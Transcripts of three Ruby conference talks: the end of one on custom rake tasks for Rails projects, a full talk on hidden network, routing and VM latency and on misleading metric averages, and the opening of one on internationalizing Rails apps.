it'll tell us: rake minus capital T will list out the tasks and it says, well, here's all the tasks that I have. This is where that description line comes in handy. Any rake task that doesn't have a description won't be listed. If it's still there, it'll still run, you can totally use it. It just won't be listed out in the rake minus capital T. Rails ships with a bunch of rake tasks. And it's just open source, right? So we can look at them. They're in the railties gem, in lib rails tasks. And so those are all of the rake files that ship with Rails. Because it's open source, we can go play in the code. So here is that log task. And you can see all it does — it's really simple. It just looks in the logs directory, gets a list of the files, and truncates them. So this is where we would go if we wanted to do something like print out the name of the file as it was doing something, do a file stat to see how much space we were saving. This is where that would go. And we could submit a pull request if we decided that we liked it, and maybe it gets pulled into the next version of Rails. So remember, rake is an automation tool. We can streamline common tasks. So remember when we raked all the things: db migrate, db seed, log clear. Well, we can streamline that. We can create a custom rake task that just does that for us. And Rails has our back. There's a Rails generator for custom rake tasks. So when you run one of the generators — or when you just run rails g, rails generate — it'll tell you, well, here's what I know how to do. And then you run rails g task and it says, well, here's how you use this thing. So let's generate a task, put it in the db namespace, and call the task streamline. And you see it'll create a file in lib tasks.
And it'll be called db.rake. When you do that, you get this empty file. There's a lot of boilerplate already taken care of for you. You've got a description — you just have to fill in the TODO. And then you get the task streamline. It's going to load the Rails environment for you. And then all you have to do is fill in the block. What do you want your task to do? We have everything we need. It's perfect. So I'm going to fill it in. I'm going to say the description is, well, it's going to run all these things. And then I change it to the hash rocket, the older hash syntax, because I just like that better. But if you like the new syntax, that's cool. We can still be friends. It's fine. It's fine. So this streamline task will now have three dependencies. We no longer need to load the Rails environment because db migrate will do that for us. So streamline will run db migrate, db seed, and log clear. And we don't need it to do anything else. And so we don't need that block. We don't need that body. We can ask our Rails app now, what do you know how to do? And we can filter it for any rake task that has the word db anywhere in the line. And it says, oh, hey, cool, I've got this new task, rake db streamline. It won't actually be highlighted — I did that so you can see it's actually there. And so we're good to go. We can run our new rake task. And it works. So it's going to migrate — so we'll create the table — run the seeds (we don't have any output for that), and then look at the log directory. It's empty. So it did all the things. We're good to go. Other streamlining, tedium sorts of things. We had a microservice setup one time and we used auth tokens to communicate between the services. And it was a calculated token that had a timestamp in it. And so to test one of the child services that had to have a valid token, it was kind of a pain. So I made a rake task to calculate a valid auth token so I could just use curl to test those. Docker management. Before we had Docker Machine, back in the Fig days, I wrote a big Rakefile to help with all the container management. And I actually still use some of those tasks to help with cleanup. We saw loading a seed file into the database. But we can also load a full production database into our local development database. Here's a custom rake task that will download a production database from Heroku and load it into your local development database. It's just a series of three tasks, one dependent on the other. So let's break them down. Here's the first task: capture backup. It's going to load the Rails environment and then it's going to ask Heroku to capture a PG backup. So Heroku is going to just go make a pg_dump and store that somewhere. We can then download it. We've got this download backup task that's going to go ask the capture backup task to capture a backup, and then we'll use curl to download that dump. So we'll have it now on the local file system. And then we have our third task, load, and it's going to use pg_restore to load that dump file, taking in all the variables from the Rails environment. And then it's just a temporary file — we don't really need it in our code base — so we'll delete that dump file. We can always run it again. So: a custom rake task to download production Heroku data and load it locally. But standard security warning. If you have sensitive data in your production database then maybe you don't want to walk around with that on your laptop. It is handy.
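Here's a hedged sketch of those three backup tasks chained together. The overall shape (capture, download with curl, restore, delete the dump) is from the talk, but the Heroku CLI subcommands (pg:backups:capture / pg:backups:public-url), the app name, and the pg_restore flags are my assumptions rather than the talk's slides:

    # lib/tasks/production_data.rake (sketch)
    namespace :db do
      desc "Capture a fresh Heroku backup"
      task capture_backup: :environment do
        sh "heroku pg:backups:capture --app my-production-app"   # app name is a placeholder
      end

      desc "Download the captured backup"
      task download_backup: :capture_backup do
        sh "curl -o latest.dump \"$(heroku pg:backups:public-url --app my-production-app)\""
      end

      desc "Load the production dump into the local development database"
      task load_backup: :download_backup do
        db = ActiveRecord::Base.connection_config[:database]
        sh "pg_restore --clean --no-acl --no-owner -d #{db} latest.dump"
        rm "latest.dump"   # it's a temp file; we can always capture another one
      end
    end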
There is value in being able to perf test code against real production data. So if you want to profile your code or if you want to do some perf testing this is a really good way to do that or just use a staging environment. Also a good idea. So we can do that. So we talked about rake for database management and maintenance. We've talked about rake for project management and maintenance. And we've talked about rake for just plain old Ruby projects. Rake can help us make our projects more manageable and make our life more serene. That's Lake Champlain in Burlington Vermont. One of my favorite places. If you have questions I would love to talk with you come up. Talk to me afterwards. I've also nearly finished writing this book data visualization toolkit. Rough cut will be available online soon on Safari books. So if data is or GIS are your thing or if you want them to be your thing then we can talk about that as well. Thank you. Thank you.
|
Although bundle exec rake db:migrate is probably the single biggest killer feature in Rails, there is a lot more to rake. Rails offers several rake tasks to help with everyday project management, like redoing a migration because you changed your mind on one of the columns, clearing your log files because they get so big, and listing out the TODOs and FIXMEs. What's even more awesome that all that is that you can create your own rake tasks. Got a tedious command-line process? Write a rake task for it!
|
10.5446/31508 (DOI)
|
Thank you for coming to my talk. That's very kind and generous of you to listen to me talk at you about things. My talk is called Don't Forget the Network. Your app is slower than you think. I'm going to talk about things that you probably haven't thought about yet about how people use your application and about ways that people using your application are having a worse time than you think that they are. I'm sorry. I don't really know of any good way to talk about this except by probably making you feel bad for your users. So brace yourselves and you'll be fine. Before I get to that, introduce myself. My name is Andre Arco. I'm indirect on almost all the things. That is an avatar of me that now that I'm looking at it, that's one avatar old. I'm sorry. I'll get it fixed by the time I post the slides on speaker deck. I wrote a book called The Ruby Way, the third edition. I co-authored the third edition of The Ruby Way. It's actually pretty great. I learned Ruby from the very first edition of The Ruby Way and it was my favorite book except that I couldn't tell anyone to use it because it was about Ruby 1.8. And so I updated it and it covers Ruby 2.2 and 2.3 and if you buy it in a couple years, you can use it to prop up your monitor and make it higher like I do with my copy of The Ruby Way second edition. I work at Cloud City Development. We do mobile and web application development from scratch but mostly what I do is join teams that need someone really senior to help with their Rails app or their front end app. I've done a lot of Ember stuff. And I guess if listening to this talk makes you feel like you could use someone to help you feel less bad, talk to me later. That is literally my job. I work on something else you may have heard of called Bundler. I mean, I've worked on Bundler for a really long time but it's been a really great experience to work on open source and to kind of interact with every aspect of the Ruby community. People do things with Bundler that I would never in a million years have imagined that people do with Ruby and then I get to help them try to solve their problems. And if we've put a lot of effort into making it, I guess, easy or, I don't know about easy, but easier to get started contributing to open source through Bundler than a lot of other open source projects. And if you're interested in contributing to open source, definitely talk to me later or tweet at me and I would love to help you start contributing to open source. The last thing that I spend time doing is called Ruby Together. Oh, I'm even wearing a shirt. And Ruby Together is a non-profit trade association for Ruby people and companies that pays developers to work on Bundler and on RubyGems so that you all can run Bundle Install and it actually works. And without companies and people giving us money, like RubyGems.org just wouldn't stay up and you wouldn't be able to Bundle Install because that stuff, like we have to work on it every week to keep it up. It's servers, it's software, it all breaks all the time. And the only reason that we're able to keep it working now that there are so many people using Ruby and using RubyGems is because companies like Stripe and Basecamp and New Relic and Airbnb are willing to give us money so that we can pay developers to make sure that it all works. We haven't let RubyGems.org go down in the last year, which is super great, but at the rate usage is going up, we need more people to give us money. 
If you are a manager or if you can talk to your manager about Ruby Together, that would be awesome. So the network and how your app is slower than you think. I guess, routing is a thing that your app has, even if you didn't think that it does. I guess at one point there was a very widely shared article on RAP Geniuses blog about how Heroku's router was a sham and everything was awful. I guess, unfortunately, whether you're on Heroku or not, your app has a router and it's probably making things worse than you think they are. So let's talk about how that is and why that is and what you can do about it. So routing, what I mean is the part of your application's infrastructure that takes the request from the outside world and load balances it or forwards it or somehow gets it through your infrastructure until it finally reaches your Rails app server. And then your Rails app server does some stuff and tells you, hey, this took 45 milliseconds and then it has to go back through Nginx or HAProxy or Nginx and HAProxy or whatever it is that you use back to the outside internet and then across the entire outside internet back to the user who was trying to find that thing out in the first place. So how exactly does this work? Like, maybe you haven't thought about this. I totally don't blame you on your laptop. This is a non-issue, right? In development, this is routing you. You talk to your app. It's great, actually. Unfortunately, in production, you need more than one app server and people are coming from a lot of different places. And so this is just like a generic Rails app. Not every Rails app will look like this, but almost every Rails app looks like this. You have some outside level load balancer. You have some inside level. Here's how we split requests up across all of the unicorns or all of the Pumas or all of the whatever. And every single one of those lines adds time to what your users see that you never saw while you were working on the program on your laptop. So question time. Raise your hand if you know how long your routing layer takes. That's what I thought. I have given this, I have asked this question in various different talks about eight times. I totally expected no one to raise their hands. I've literally had one person ever raise their hand. Eight talks. That's probably like, I don't know, closing in on a thousand people now. I once asked this question at a DevOps conference and zero people raised their hand. I don't expect you to know the answer to this question. But it's actually a really important question to ask because your end user's experience is 100% directly impacted by this. Like someone who goes to your production app and tries to use it experiences 100% of your routing layer twice for every request that they make. And like, is it a long time? Who knows? None of us. And then on top of that, like so not only is there this question of like how long does it take in the perfect case from like the time they make the request to the time your app is processing it and then from the time your app stops processing it to the time they get the response, like none of that time shows up in your nice new relic graph that's like how long this took. Like zero of those milliseconds are included in that number. So you can look at the number and be like, yeah, we answer all our requests in, I don't know, what's a good Railsy number, 250 milliseconds. I feel like that's a pretty common one. 
But like how much time do you need to add to that before you know how much your users are actually experiencing? How do you even find out? And then once you find out, what if too many requests come in at exactly the same time? Just having that routing layer where all of your requests come to one point and then they fan out across other points — this was like the main point of that Rap Genius article about what Heroku does, and honestly, there's nothing else that you can really do that makes sense: you just kind of randomly assign them. Like, well, here's one for you, here's one for you, here's one for you, here's one for you. And the problem is almost all Rails apps have some requests that take 10 milliseconds and some requests that take like a second and a half. And when you're just throwing them out at random to every server that can possibly service them, unfortunately, statistically, it is very likely that you will end up with two horribly slow requests stacked up behind each other, and then the really fast requests start to stack up behind those, and it isn't very long before you see a 30 second timeout and you're like, that makes no sense. That request — New Relic says that request takes 10 milliseconds — why would it hit a 30 second Heroku timeout? And so it's not perfect, but you can at least start to get a little bit of visibility into this using a New Relic feature called queue tracking, where you have your load balancer set a header that says, I got this request at this exact time. And then your app server says, well, I didn't get this request until this much later time. And then New Relic can add a thing to your graph that says, well, your requests are spending about this much time just sitting around waiting for a server to have availability to answer them. And that can be a completely separate thing that people don't measure that is sometimes adding 50% — I've seen that — to the total time users spend waiting on a request. And it wasn't even measured, no one knew it was happening. Everyone was just like, that's weird. It seems to take a lot longer to get a response than New Relic says it takes to make the response. I wonder, hmm, you know. So ultimately, what I'm trying to impress on all of you is that the overall request time is not the number that Skylight or New Relic — pick a service, I don't really care — tells you your request takes. Like, that's a good number. Measure that number, pay attention to that number. If that number changes a lot, you want to know why that number changed a lot because that's really important. But don't think that that number means that that's how long people are taking to get the results of your app running. Right — exactly. It's not the time that you measure that your app takes to run. And honestly, even that queue tracking that I was talking about requires that the clocks on the load balancer server and the Ruby app server be synchronized so precisely that they can measure milliseconds accurately. And it's very easy to end up with clocks that are milliseconds off, and then your measurements are off. And so what you want instead is a holistic measure of how long does it actually take to be a person on the Internet saying, hey, Rails app, I want to know a thing, and then for the Rails app to say, okay, here's your thing, and then it arrives back.
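Going back to the queue-time header idea for a second — here's a rough sketch of measuring it yourself in a Rack middleware, assuming the load balancer stamps X-Request-Start with a Unix timestamp in microseconds (header formats vary by proxy, and the clock-skew caveat above still applies); the class name and reporter are placeholders:

    # Sketch of a Rack middleware that reports time a request spent queued before the app saw it.
    class QueueTimeReporter
      def initialize(app, reporter: ->(ms) { Rails.logger.info("queue_time_ms=#{ms.round(1)}") })
        @app = app
        @reporter = reporter   # swap in your real metrics client here
      end

      def call(env)
        if (raw = env["HTTP_X_REQUEST_START"])
          started_at = raw.delete("^0-9").to_f / 1_000_000   # assumes "t=<microseconds>"
          queue_ms = (Time.now.to_f - started_at) * 1000
          @reporter.call(queue_ms) if queue_ms.between?(0, 60_000)  # ignore clock-skew nonsense
        end
        @app.call(env)
      end
    end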
So the strategy that I have actually had real success with here is to deliberately create a Rails controller that returns an empty string, and then set up a service like Runscope or ThousandEyes or even Pingdom — there are services whose entire reason for existence is so that you can make requests to your own stuff from all over the world and find out how much delay your overall infrastructure adds to your application. And if you have a Rails app that returns an empty string — I guess honestly you could even do a rack middleware that returns an empty string, because New Relic measures the Rails framework overhead — you just want to know about all of the time up to the time it hits your Ruby app and all of the time after it comes out of your Ruby app. And so you can use one of these monitoring services to say, this is like the weather report for our users around the world. And honestly, I've worked at companies where 60% of their traffic was the US, but for no particularly apparent reason, 35% of their traffic was from Brazil. And then you really care a lot about network conditions changing and meaning that traffic to Brazil got a lot slower today. You should figure out why that happened and maybe think about setting up a CDN in Brazil. Because if your traffic numbers are relevant to your business making money — and they almost always are — this matters a huge amount. And right now, chances are good that nobody has any idea what they are. Are they bad? We don't know. Are they great? We don't know that either. Maybe they're great. Like honestly, if all of you go home today and start monitoring these numbers and they're fantastic numbers, I will be extremely happy for you. Based on past experience, unfortunately, they're probably not going to be that great. But knowing what they are is way better than having no idea that they exist. Very closely related to things taking longer than you think they do: let's talk about servers. So I'm assuming that if you have things deployed, you have servers. This seems like a good bet. Let's talk about what's happening on your servers. You buy them and you rack them, or you rent a fraction of one, or, I don't know, you rent a fraction of a virtual machine that is a fraction of a physical machine. It happens. You end up with a piece of a computer and some stuff is happening on that computer. And even if you bought the computer yourself and racked it yourself, it's still running a ton of stuff and you have no idea what that stuff is. And I'm not going to tell you that you need to know what all of that stuff is, but I am going to tell you that it's really important to know how that stuff is impacting the thing that you do care about, which is your users' experience. And so a big thing that impacts this: whether you use Ruby or Python or Node or Go, you have a runtime for your application, right? Even Go has a garbage collector and a runtime that all Go programs run inside. And what that means is your application sometimes isn't running while your program is running. And when that happens, your code isn't running, your instrumentation isn't running, and you have no idea how long that took. So if the garbage collector runs and your entire application just stops for a while, how do you know that that happened? How do you know how long it took? Like, you can't, right? It's really hard to write code that measures time that your code wasn't allowed to run.
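Back to the empty-endpoint idea from a moment ago — a sketch of what that looks like in a Rails app (the route, controller name, and response style are placeholders of mine); an external monitoring service hitting this from around the world measures everything except your application's own work:

    # config/routes.rb
    get "/ping", to: "ping#show"

    # app/controllers/ping_controller.rb
    class PingController < ActionController::Base
      def show
        # Do as close to nothing as possible, so the measured time is
        # network + routing + framework overhead rather than app work.
        render plain: ""
      end
    end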
So based on real-world usage, definitely Go and Java and Ruby all have garbage collection pauses where execution of your code just — nope, hang on, wait, got to collect some garbage. Okay, that's good, you can keep going. And Ruby, I guess, recently has added a thing called GC::Profiler that at least reports after the fact how long garbage collection took, which is awesome. But there are more reasons than just garbage collection that your code could end up paused. And so what you actually want is some way to say, I can tell that my code stopped running — it was still working, but it stopped running for a second — and then it started running again. And how long was that? And there's this trick — I learned it from somebody who works at Papertrail, Larry Marburger, and I think he got it from some of his colleagues at Papertrail — that's super clever. What you do is you start a new thread with Thread.new, and then you say: what is the time? sleep 1. What is the time? And then you subtract them and you send the difference off as a metric. And if your code stops running, sleep 1 will take longer than one second. Little known fact. And so by monitoring how much wall clock time passes while a thread in your application is calling sleep 1, you can accurately graph how much overhead the surrounding interpreter is adding to your overall execution time. And I have definitely seen this happen where you're running a Ruby program and you're like, that's weird, it seems kind of slow. And then you check the how-long-does-it-take-to-sleep-for-a-second graph and you're like, oh my God, we're spending 150 milliseconds every second doing something that's not running my program. And sometimes that means you have a memory leak. Sometimes that means that machine just got into a really bad, weird state. But at least then you know. And at least then you know that it's exactly that app server that's having this problem and all the other app servers are fine. Super useful. I guess very, very closely related to this is the virtual machine — now that we're talking about interpreter lag — you're probably also running that interpreter inside a virtual computer. And Amazon, DigitalOcean, Heroku, Engine Yard, OpenStack — you're either running on a VM, or you're running on a VM inside of a VM, or maybe even, if you use Docker, a VM inside of a VM inside of a VM. Hooray. And as you can imagine, this is yet another way to have weird times where your code doesn't run and you don't actually know it, because your code literally couldn't run. And it's even worse than that, because sometimes you'll end up with resource-specific contention, right? Like in a VM, what if one of your co-tenants is suddenly — like, your co-tenant is running a memcached server, and so all the memory I.O. is going to your co-tenant. How do you even know if that's a problem? What if they're doing something really storage heavy and that means you can't get I.O. anymore? And so there's, at a minimum — the resources that you may care about are CPU and memory and disk, right? And network I.O., I guess, the second flavor of I.O. And you don't know, when you get a shiny new empty VM: maybe everything is great, and maybe that machine has basically no network I.O. available, or has basically no memory I.O. available, because of co-tenants that you don't know exist.
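The sleep-1 trick described above, sketched out — the reporting lambda is a stand-in for whatever metrics client you actually use:

    # Sketch of the Papertrail-style "sleep 1" lag monitor.
    report_lag = ->(ms) { $stderr.puts("interpreter_lag_ms=#{ms.round(2)}") }

    Thread.new do
      loop do
        before = Time.now
        sleep 1
        # Anything beyond one second is time the interpreter spent not running us:
        # GC pauses, a starved VM, a co-tenant hogging the box, and so on.
        lag_ms = ((Time.now - before) - 1.0) * 1000
        report_lag.call(lag_ms)
      end
    end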
And so Netflix has a really clever way to check for this, I guess. They've written about it kind of at length. And what they end up doing is Netflix spins up a new EC2 instance and then before deploying to it, they shove a giant pile of benchmark suites onto it and they run the benchmark suites and then they compare it to what they've decided is acceptable performance for that price point on EC2. And if it's below their acceptable benchmarks, they throw away that VM and get a new VM and then try the benchmark suite again and then throw that one away and then get a new one. And eventually, they hit an instance that meets their criteria and they said in their paper that they have observed almost an order of magnitude in difference in performance at the same price point because Amazon sells both the newest generation of hardware and two or three or sometimes even four generations old as the same VM, very large air quotes around same. And then you have to deal with like co-tenancy issues where you may have a VM on a very old, very heavily contended physical machine, you may have a VM on a brand new, uncontended machine. And like, so for Netflix, they said that doing this and I'm probably going to get these exact numbers wrong. I'm sorry, it's been a while since I looked at that paper. They saved something like a third of their overall server costs by doing this benchmarking and only accepting VMs that met their minimum criteria because of the amount, like they have a static amount of traffic that they need to serve, but they got machines that were more capable to do it at the same price point. And so they just needed to spin up less machines and pay Amazon less money. I guess, so you're probably not Netflix, this probably doesn't matter to you that much. But it is at least something that you can be aware of when you're like, man, 10 servers seem to be enough to serve this traffic last week, right? And then specifically, like, do you know what it is that your app cares about? Like, it is entirely possible that your application is in completely CPU bound and you honestly don't even care if your co-tenants are doing tons of IO. But you care a lot if your co-tenants are doing video encoding. Maybe it's memcache server and you're just memory IO bound. Maybe it's Postgres and you're everything bound. Postgres just wants everything. But like, this is the kind of thing that actually matters. And knowing this difference can be a really big difference in how many servers you need, how much your servers cost. And as you get bigger and bigger, like, one third more performance for the same cost becomes a larger and larger number that is worth putting more and more effort into getting. So now that I've convinced you that you need to measure all of these things that you weren't measuring before, let's talk about metrics. I guess good point about the Ruby community, they're pretty good at measuring metrics. That's great. New Relic makes it really easy. You're gem installed New Relic. Hooray! And metrics. Metrics are really important. Making things, as we were just discussing, is really the only way to know what's happening. Without metrics, your production is kind of a black box. And you're like, oh, things aren't as good as they were before. I don't know why. Or probably even how, exactly. Because I wasn't measuring, wasn't able to measure, didn't know how to measure the things that matter. 
So really, the first time that the importance of metrics hit home for me was in 2009 at GitHub's first CodeConf. I saw a talk by Coda Hale called Metrics, Metrics Everywhere. And kind of the underlying point of his talk was that the reason that all of us have jobs and the reason that all of us write software is to deliver business value. Whether that's to our bosses or to customers or to clients. Most of the software exists for the purpose of delivering business value, especially if you're getting paid to write it, right? And if you can't measure it, you can't tell if that is what you are doing. So having said that, you're probably not super impressed by me telling you that metrics are important. So you do need to know what's going on. There's a catch. Once you have metrics, you have a tendency to become convinced that you now understand what is happening. And I don't blame you. I do this too, right? It's like a human thing. You're like, oh, I'm measuring a thing. Now I understand it. Just like being able to see the speedometer does not tell you how the car's transmission and engine work, being able to see a metric on your application does not tell you about how and why it is working. It just tells you something is very different than it was before. And now you need to figure out what it is and why it is different. And a very common problem is that having metrics, having some visibility, makes people think that they have total visibility, and that just isn't how things work, unfortunately. So at the end of this little bit about metrics, this is probably going to be you instead. I'm going to talk about some ways that metrics actively mislead you. And the biggest thing that causes this kind of misunderstanding driven by metrics is averages. When you have a lot of metric information, especially if you have a bunch of app servers, the easiest way to distill that down into something that you can quickly communicate is to take the average. A super good example of this is the way that New Relic's dashboard, when you first open it, it's like, here's a giant number. This is the average of all requests across all app servers. So you see those graphs, you see the numbers going up and down, you're like, great, now I know what's happening with my app, right? Unfortunately, no. Brains are really highly developed, carefully tuned pattern matchers. This is how humans can see Jesus in toast. This is how you can see an average and think, I know what that means. So your brain's immediate extrapolation from an average is probably what's called a normal distribution. There we go. Normal distribution. You think, oh, the average is going to be right at the top of that. This is often called a bell curve and it's what happens when all of the inputs into the graph are generated by a random function. Tell me if you think that your app is a random function. I mean, maybe it feels like it's a random function. But your app is not actually a random function, and the practical upshot of that is that it doesn't look like this at all. This is a more realistic graph of what might be producing an average that's right at the zero point on that graph. To kind of drive home how wildly misleading averages can be, let's look at a bunch of real life graphs at the same time. So this is a whole bunch of different measured metrics from a real life thing. It was a MySQL benchmark. It doesn't really matter what it is. From left to right, it's collecting the number over time.
So near the left, it's like the things that were fast and then as you go to the right, it's things that were slower and slower and slower during the benchmark. And so the small black vertical lines that you maybe can't see very well represent the average for that particular line. So to make it easier to see, I'm going to line up all of the averages of this same graph. So not only do any, none of these look like a bell graph, right? Bell curve, not a single one of these looks like a bell curve. Worse than that, most of them have zero actual data points at the average line. It's really characteristic to have a very large number of points either clustered together in the fast zone or spread out over like the long tail of slow things. But like if you look down near the bottom, like some of these lines don't even have a single result that's near the average line. And so if you're looking at New Relic, you might not even have any requests that take the number, like the amount of time that is the number of milliseconds that you're seeing in giant font on your dashboard. This is the problem of averages, right? Unless your metrics are being generated by a random function, the average is going to actively mislead anyone who sees it. There's a great quote about this from a tweet by a friend of mine, Esopharek, problem with averages, right? On average, everyone's app is awesome. And so, again, averages, I guess the single good thing that is really great about averages is that they can tell you that something changed, right? You can say, oh, my average was this before, but my average is this now. That's weird. The problem with averages is that they can't tell you what changed or how it changed. And it's actually possible to get that information out, and so I'm going to show you how to do that. So while averages can tip you off that something changed, so here's a graph of an average. And as you can see, things are taking about less than 100 milliseconds, but that effectively means there could be tons of things happening that take about 100 milliseconds, or there could be tons of things happening that take 10 milliseconds and tons of things happening that take three seconds. It's an average, so there's literally no way to know. One way to get around this is to graph the median rather than the average. The median is the number that was bigger than half of the numbers and smaller than half of the numbers. The great thing about the median is that you are sure that it actually happened, right? The average may or may not have ever actually happened, but the median definitely happened. And so if we add the median to this graph, you can see on the purple line, we now actually know more information than we did before. At least half of the values are actually very, very fast. It looks like around in the 10 millisecond range, maybe 20 milliseconds. So even though the average jumped all the way up to 150 milliseconds at one point, at least half of the requests were happening still equally quickly. They didn't slow down. That tells us that since most of the requests didn't slow down, this wasn't like an application-wide change, right? We didn't suddenly get a really slow load balancer. We didn't see really, right? This wasn't a really a network switch problem where all of the traffic was impacted. The next thing you can do is graph other places. The median is the 50th percentile, right? Half is below, half is above. Start graphing the 95th percentile. 95% was below, 5% was above. 
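As a quick aside before returning to the graphs: the median and percentiles being described are only a few lines of Ruby to compute from raw timings. The sample numbers here are invented.

```ruby
# Computing the percentiles discussed above from raw request timings (ms).
def percentile(sorted, pct)
  return nil if sorted.empty?
  sorted[((pct / 100.0) * (sorted.length - 1)).round]
end

timings = [12, 14, 15, 16, 18, 22, 95, 140, 2800] # invented sample data
sorted  = timings.sort

average = timings.sum / timings.length.to_f  #=> ~348.0 -- a number that never actually happened
p50     = percentile(sorted, 50)             #=> 18     -- a number that definitely happened
p95     = percentile(sorted, 95)             #=> 2800
p99     = percentile(sorted, 99)             #=> 2800

puts "avg=#{average.round(1)}ms p50=#{p50}ms p95=#{p95}ms p99=#{p99}ms"
```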
Here you can see that the slowest 5% of requests got dramatically slower. More than 10% slower than the median. And that's what dragged the average up. Oftentimes, even better than the 95th percentile is the 99th percentile. This gives you a good idea of what one, it's one out of 100, right? So this is actually a pretty good indicator of what the occasional slow request looks like, right? Well, I had to rescale the graph. And the slowest 1% of requests are now clearly the entire reason why the average tripled. The median stayed exactly the same. The median is now a flat line. And that slowest 1% is probably some single specific controller action that you now need to go find and figure out what exactly happened to that specific single thing. And so just by graphing the percentiles rather than the average, we can immediately rule out about half of the possible problems that made our average slower. And it works the other way around, too. If you look at the graph of the 99th percentile and it isn't dramatically different even though your average is higher, then you know not to look for a single controller action. You know to look for a systemic problem. Aggregate graphs, this is another really common thing where aggregation is a fancy way to say, I got the many versions of this metric from many servers and then I averaged them. So here, again, here's an average graph. This one happens to be taken from the actual Bundler API. And it is a graph of the trick that I mentioned where you call sleep 1 and then you see how long it took. So the number that we're tracking here is milliseconds and it went from taking two milliseconds to, you know, one second plus two milliseconds to taking one second plus five milliseconds. And that means that garbage collection pressure must have been twice as bad, question mark. We don't know. This is an average. And you can improve this with breakout graphs. If you are collecting a number from 25 machines, put 25 lines on your graph instead of one that will mislead you about what all of the different machines are doing. Here is a breakout graph of the same data. Kind of like I was mentioning before, with the breakout graph, we can see, holy crap, this had to be rescaled. One of the machines started taking 35 milliseconds per second to sleep. But all the other machines were basically fine. And so we wound up resolving this issue by just killing the one dino that was having trouble and restarting it as a fresh dino. But we didn't have to nuke all of our dinos. We didn't have to write this narrow down the problem immediately just from having a breakout graph. So do it. Visualize your data. Here is an example of why visualizing your data is so, so, so important. These are some different data sets. Each orange dot is a single entry on that data set. Can anyone guess what the blue line is? So that average, average, average, average? It's actually even worse than that. The average of y is exactly the same on every crack. It's actually even worse than that. All four data sets have the same average of x, average of y, variance of x, variance of y, correlation of x and correlation of y, and the same linear regression. Actually graph your data and then look at it because the numbers of the averages and the variances and the correlations and the linear regressions don't contain any of the information about what is different in those graphs. One final note. A lot of people that even talk to me about how awful averages are, I then am like, oh, hey, so how do your alerts work? 
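Before the alerting question gets answered below, here is the shape of the breakout idea in code: tag each measurement with the machine that emitted it, so the dashboard can draw one line per server instead of one misleading aggregate. The metric naming scheme is just an example, and puts stands in for whatever metrics client you use.

```ruby
# One metric series per machine, so dashboards can show breakout graphs.
require 'socket'

HOSTNAME = Socket.gethostname.tr('.', '_')

def emit(metric, value)
  # e.g. "app.sleep_lag_ms.web-3 17.2" -- swap puts for your metrics client
  $stdout.puts "app.#{metric}.#{HOSTNAME} #{value}"
end

emit('sleep_lag_ms', 17.2)
```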
And a lot of people have alerts that are set up to only talk to them after the average is bad. And as you can maybe guess, by the time the average is bad, it is too late. Definitely break out your alerts as well as your graphs. You want to know when the first server went down, not when the average of the servers is a down server. Right. So ultimately, I really just wanted to let you guys know that the network is a part of your application. Most people don't think about it because they don't have to interact with it in their day-to-day development on their own local machine. And after you have deployed your application, it is really user experience that matters, not how many milliseconds your Ruby app spends running code. That's it. So the question was, if you don't alert on averages, how do you prevent continuously alerting, getting alert fatigue, and then not noticing that something actually bad happened? And the question included a note that there is no silver bullet for this. And unfortunately, the answer is there is no silver bullet for this. So the best plan that I have ever seen from the best operations people that I have worked with is figure out what the baseline of your system when it's functioning is and alert when your system is not that. That means figuring out how many requests you're successfully serving per minute and alerting when it deviates from that more than 50%. Figuring out when it's normal to have that deviate and then not alerting on that. And it's actually a ton of work because every single application has a completely different norm. Some Rails applications, they serve like 50 requests a minute and that runs their entire profitable business. Some Rails applications serve hundreds of thousands of requests a minute and they're not profitable yet. You need to figure out how it is that your metrics look when your company is functioning, both software-wise and company-wise. And you need to alert when it's not the thing that gives you the indicator that things are okay. That's really the best advice that I have for you. Five seconds. Any more questions? All right. I'm happy to talk about this stuff later. Bye.
|
When you look at your response times, satisfied that they are "fast enough", you're forgetting an important thing: your users are on the other side of a network connection, and their browser has to process and render the data that you sent so quickly. This talk examines some often overlooked parts of web applications that can destroy your user experience even when your response times seem fantastic. We'll talk about networks, routing, client and server-side VMs, and how to measure and mitigate their issues.
|
10.5446/31511 (DOI)
|
Okay, so we're at 10.50, so I'll go ahead and get started. So I'm going to be giving this talk on localization and translation and internationalization in your Rails apps. It's a cleverly entitled finding translation, although someone yesterday suggested the alternate title of many, many yaml files, which we'll get into why that might be a fitting title for this talk as well. But we'll start out by defining our terms. Localization is the process of adapting internationalized software for a specific region or language by adding the local specific components and actually translating the text. Internationalization refers to the process of actually setting up your app in such a way that it can be translated. And we'll be talking mostly about how to set yourself up for success in terms of when you are designing your app, even if maybe you're not even planning on having it translated off of the bat. Some of these processes and things will be good things to have in mind in any case. So thanks Wikipedia for those definitions. Let's get rolling. In plain English we're talking about translating and more importantly getting ready to translate your app. So what are we talking about when we talk about translation? There's the most straightforward type which most people are going to be thinking about when I say the word translation which is English to French, French to Arabic, English to German, Swahili to Esperanto, Spanish to Cantonese, etc. Other things that are important in this translation process though is what country you're actually talking to. So are you talking to British consumers? Are you talking to American consumers? Are you talking to Portuguese consumers? Are you talking to Brazilian consumers? Those populations are going to speak the same language but are not necessarily going to have the same content, be delivered to them. Another thing you want to be aware of is the register, whether that's formal or informal, professional or like your Twitter feed, AP style or MLA style I guess, things like formatting, so on and so forth. We're mostly going to be talking about the first type but you should always have in mind the second type. When you're doing a translation you should be thinking about what country the people using that language are going to be coming from. Things that will be relevant to that are things like units of measurement, government legal terms, date formatting, so on and so forth. And the third type is not something we're going to talk about really but your translators should be aware of where you're coming from in terms of the register that you want to convey in your app so that they can write to the same kind of audience. I could also see using these same tools to transpose between registers. So say you had a kids and parents version of your site, you could use some of these I18N conventions to do that as well. I've never done it but it could be fun. So who am I? Points if you get this joke, 24601. I'm Valerie Willard. On Twitter I'm at Valerie codes and you should tweet this talk because at mentions are my lifeblood. I'm a Rails developer at Panoply which is a podcasting platform. We're part, yes, podcasts. We're part of Slate. And if you want to geek out about podcasts, please find me after the talk and I will give you all my recommendations and take all of your recommendations and my subscription list will continue to balloon uncontrollably. I have interest in linguistics, translation and language studies. So prior to becoming a developer I was a French major. 
